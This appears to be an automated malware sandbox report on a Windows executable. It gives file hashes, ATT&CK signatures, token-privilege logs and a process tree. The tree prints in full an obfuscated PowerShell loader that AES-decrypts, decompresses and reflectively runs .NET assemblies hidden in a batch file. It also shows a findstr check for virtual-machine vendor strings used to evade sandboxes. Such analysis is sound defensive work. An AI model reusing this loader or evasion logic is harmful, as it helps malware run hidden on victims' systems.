Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
23/08/2024, 17:29
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20240729-en
General
-
Target
file.exe
-
Size
2.2MB
-
MD5
f06c54ee336f52fdc772b069a87f11a3
-
SHA1
aeac1f167a0416708104edc96aa7d451e0b3ddfc
-
SHA256
80dfa383874c9458bd67b255fde1a6d6181807bda659ce70f989784094dba918
-
SHA512
8e75dc2787bc84efcc3deb688628d74cbdfefe8c851d97c916b4bfc177adb2436b0b6decfffb9262089d1b0ab7501e95090f1837ffed3d330164bc2532ecf5e8
-
SSDEEP
49152:cEHtPBsU7o5PiiTcMGCVmbikTDKytL5pNYtCLzILWMhS+/Kpo0zPV:cyDvoPia7VmJKy48Vn+/gdV
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2220 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2220 powershell.exe -
Suspicious use of AdjustPrivilegeToken 41 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2896 WMIC.exe Token: SeSecurityPrivilege 2896 WMIC.exe Token: SeTakeOwnershipPrivilege 2896 WMIC.exe Token: SeLoadDriverPrivilege 2896 WMIC.exe Token: SeSystemProfilePrivilege 2896 WMIC.exe Token: SeSystemtimePrivilege 2896 WMIC.exe Token: SeProfSingleProcessPrivilege 2896 WMIC.exe Token: SeIncBasePriorityPrivilege 2896 WMIC.exe Token: SeCreatePagefilePrivilege 2896 WMIC.exe Token: SeBackupPrivilege 2896 WMIC.exe Token: SeRestorePrivilege 2896 WMIC.exe Token: SeShutdownPrivilege 2896 WMIC.exe Token: SeDebugPrivilege 2896 WMIC.exe Token: SeSystemEnvironmentPrivilege 2896 WMIC.exe Token: SeRemoteShutdownPrivilege 2896 WMIC.exe Token: SeUndockPrivilege 2896 WMIC.exe Token: SeManageVolumePrivilege 2896 WMIC.exe Token: 33 2896 WMIC.exe Token: 34 2896 WMIC.exe Token: 35 2896 WMIC.exe Token: SeIncreaseQuotaPrivilege 2896 WMIC.exe Token: SeSecurityPrivilege 2896 WMIC.exe Token: SeTakeOwnershipPrivilege 2896 WMIC.exe Token: SeLoadDriverPrivilege 2896 WMIC.exe Token: SeSystemProfilePrivilege 2896 WMIC.exe Token: SeSystemtimePrivilege 2896 WMIC.exe Token: SeProfSingleProcessPrivilege 2896 WMIC.exe Token: SeIncBasePriorityPrivilege 2896 WMIC.exe Token: SeCreatePagefilePrivilege 2896 WMIC.exe Token: SeBackupPrivilege 2896 WMIC.exe Token: SeRestorePrivilege 2896 WMIC.exe Token: SeShutdownPrivilege 2896 WMIC.exe Token: SeDebugPrivilege 2896 WMIC.exe Token: SeSystemEnvironmentPrivilege 2896 WMIC.exe Token: SeRemoteShutdownPrivilege 2896 WMIC.exe Token: SeUndockPrivilege 2896 WMIC.exe Token: SeManageVolumePrivilege 2896 WMIC.exe Token: 33 2896 WMIC.exe Token: 34 2896 WMIC.exe Token: 35 2896 WMIC.exe Token: SeDebugPrivilege 2220 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 1744 wrote to memory of 328 1744 file.exe 31 PID 1744 wrote to memory of 328 1744 file.exe 31 PID 1744 wrote to memory of 328 1744 file.exe 31 PID 1744 wrote to memory of 328 1744 file.exe 31 PID 328 wrote to memory of 2896 328 cmd.exe 33 PID 328 wrote to memory of 2896 328 cmd.exe 33 PID 328 wrote to memory of 2896 328 cmd.exe 33 PID 328 wrote to memory of 2896 328 cmd.exe 33 PID 328 wrote to memory of 1484 328 cmd.exe 34 PID 328 wrote to memory of 1484 328 cmd.exe 34 PID 328 wrote to memory of 1484 328 cmd.exe 34 PID 328 wrote to memory of 1484 328 cmd.exe 34 PID 328 wrote to memory of 2712 328 cmd.exe 36 PID 328 wrote to memory of 2712 328 cmd.exe 36 PID 328 wrote to memory of 2712 328 cmd.exe 36 PID 328 wrote to memory of 2712 328 cmd.exe 36 PID 328 wrote to memory of 2220 328 cmd.exe 37 PID 328 wrote to memory of 2220 328 cmd.exe 37 PID 328 wrote to memory of 2220 328 cmd.exe 37 PID 328 wrote to memory of 2220 328 cmd.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7z6D3FD6D0\onitest.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:328 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic diskdrive get Manufacturer,Model3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
C:\Windows\SysWOW64\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"innotek GmbH" /c:"VirtualBox" /c:"Compute Engine" /c:"Supermicro"3⤵
- System Location Discovery: System Language Discovery
PID:1484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function VxWFO($fEFcX){ $wYcHJ=[System.Security.Cryptography.Aes]::Create(); $wYcHJ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $wYcHJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $wYcHJ.Key=[System.Convert]::FromBase64String('mbloPEknf1TwaS6SK0+bcsM1DbtN30rzhG1qypXEfHs='); $wYcHJ.IV=[System.Convert]::FromBase64String('me2XyZir0Pd2lyw9aW1tVQ=='); $DRUeH=$wYcHJ.CreateDecryptor(); $aPWFg=$DRUeH.TransformFinalBlock($fEFcX, 0, $fEFcX.Length); $DRUeH.Dispose(); $wYcHJ.Dispose(); $aPWFg;}function NMDkA($fEFcX){ IEX '$jtKnX=New-Object System.IO.M*em*or*yS*tr*ea*m(,$fEFcX);'.Replace('*', ''); IEX '$qIDMr=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$WzKKY=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jtKnX, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $WzKKY.CopyTo($qIDMr); $WzKKY.Dispose(); $jtKnX.Dispose(); $qIDMr.Dispose(); $qIDMr.ToArray();}function sFVdN($fEFcX,$riShO){ IEX '$hexoC=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$fEFcX);'.Replace('*', ''); IEX '$kwGhc=$hexoC.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$kwGhc.*I*n*v*o*k*e*($null, $riShO);'.Replace('*', '');}$zbcdR = 'C:\Users\Admin\AppData\Local\Temp\7z6D3FD6D0\onitest.bat';$host.UI.RawUI.WindowTitle = $zbcdR;$uAjCx=[System.IO.File]::ReadAllText($zbcdR).Split([Environment]::NewLine);foreach ($xhrJZ in $uAjCx) { if ($xhrJZ.StartsWith(':: ')) { $wfcOv=$xhrJZ.Substring(3); break; }}$ZVkiY=[string[]]$wfcOv.Split('\');IEX '$OCqxy=NMDkA (VxWFO ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($ZVkiY[0])));'.Replace('*', '');IEX '$YxHLS=NMDkA (VxWFO ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ZVkiY[1])));'.Replace('*', '');sFVdN $OCqxy $null;sFVdN $YxHLS (,[string[]] ('')); "3⤵
- System Location Discovery: System Language Discovery
PID:2712
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.5MB
MD5d01d6cdfbc82758617945d545d134145
SHA1e64bd9b5e7fd0ccc63a0c3a78c5a2dcab6e54903
SHA256f8d2db6c5112ec887156b6184a6cc4a93ac88f3896422fec03034bd9a5575d9a
SHA512fe2d0ac4c341ddff3dc4ce22cd4eab83e06c87612a462ee11d7c83b666a2b68182e6c78b0d18b8b3fce4e7e5848a929b6fe4fa8ab4c2354b531008a7c6edf717